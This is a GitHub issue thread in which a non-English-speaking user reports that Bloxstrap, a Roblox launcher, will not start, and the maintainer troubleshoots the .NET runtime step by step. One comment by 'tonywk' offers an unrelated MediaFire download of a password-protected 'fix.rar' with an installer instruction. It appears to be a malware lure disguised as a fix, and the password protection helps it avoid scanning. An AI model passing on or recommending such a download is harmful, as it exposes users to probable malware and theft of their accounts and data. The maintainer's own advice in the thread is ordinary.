### ISSUE TITLE
[BUG] My blockstrap won't start

### ISSUE THREAD

**Issue by NayQwaak** [bloxstraplabs/bloxstrap#2752]
### Acknowledgement of preliminary instructions

- [X] I have read the preliminary instructions, and I am certain that my problem has not already been addressed.
- [X] I have thoroughly looked through the available Wiki articles and could not find a solution to my problem.
- [X] I am using the latest version of Bloxstrap.
- [x] I did not answer truthfully to all the above checkboxes.

### What problem did you encounter?

When I run the blockstrap, it just doesn't work, there's no sign of it starting. I tried to download the blockstrap again, but it doesn't work that way either. I tried to look for information on how to launch the blockstrap, found an article, performed all the actions and nothing happened, and the link to another download of the blockstrap did not work either, help. (I am Russian and I write from a translator, sorry for the mistakes)

**Comment by pizzaboxer** [comment]
Is it Bloxstrap or Roblox that won't open? Are you trying to install it, or trying to launch Roblox?

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by NayQwaak** [comment]
Roblox player starts, but the blockstrap does not, I tried to install it, even tried different versions, but it does not start at all

**Comment by NayQwaak** [comment]
> Is it Bloxstrap or Roblox that won't open? Are you trying to install it, or trying to launch Roblox?

Roblox player starts, but the blockstrap does not, I tried to install it, even tried different versions, but it does not start at all

**Comment by pizzaboxer** [comment]
Open a Command Prompt window, and run this command:

`dotnet --info`

Post a screenshot of what you see

**Comment by lh356gamer** [comment]
> Open a Command Prompt window, and run this command:
> 
> `dotnet --info`
> 
> Post a screenshot of what you see

![image](https://github.com/user-attachments/assets/88a49082-5883-43e9-babb-a0eb171fd0a9)

**Comment by NayQwaak** [comment]
![image](https://github.com/user-attachments/assets/f462bed0-c3ac-4404-9380-b6d0d7f05b9f)

**Comment by NayQwaak** [comment]
> Open a Command Prompt window, and run this command:
> 
> `dotnet --info`
> 
> Post a screenshot of what you see
Here

**Comment by pizzaboxer** [comment]
Open the Windows Event Viewer (eventvwr.msc), go to Windows Logs -> Application, are there any recent error entries relating to .NET? If so, show their details here.

**Comment by NayQwaak** [comment]
> Open the Windows Event Viewer (eventvwr.msc), go to Windows Logs -> Application, are there any recent error entries relating to .NET? If so, show their details here.

![image](https://github.com/user-attachments/assets/b1fce053-6880-46e1-af7f-853a6dad8d8b)

**Comment by pizzaboxer** [comment]
Try fully reinstalling the runtimes. Uninstall them from Windows Settings (just search for Windows Desktop Runtime in the programs list), make sure they're fully gone by verifying with `dotnet --info`, then reinstall it from https://aka.ms/dotnet-core-applaunch?missing_runtime=true&arch=x64&rid=win11-x64&apphost_version=6.0.16&gui=true. See if it works after that.
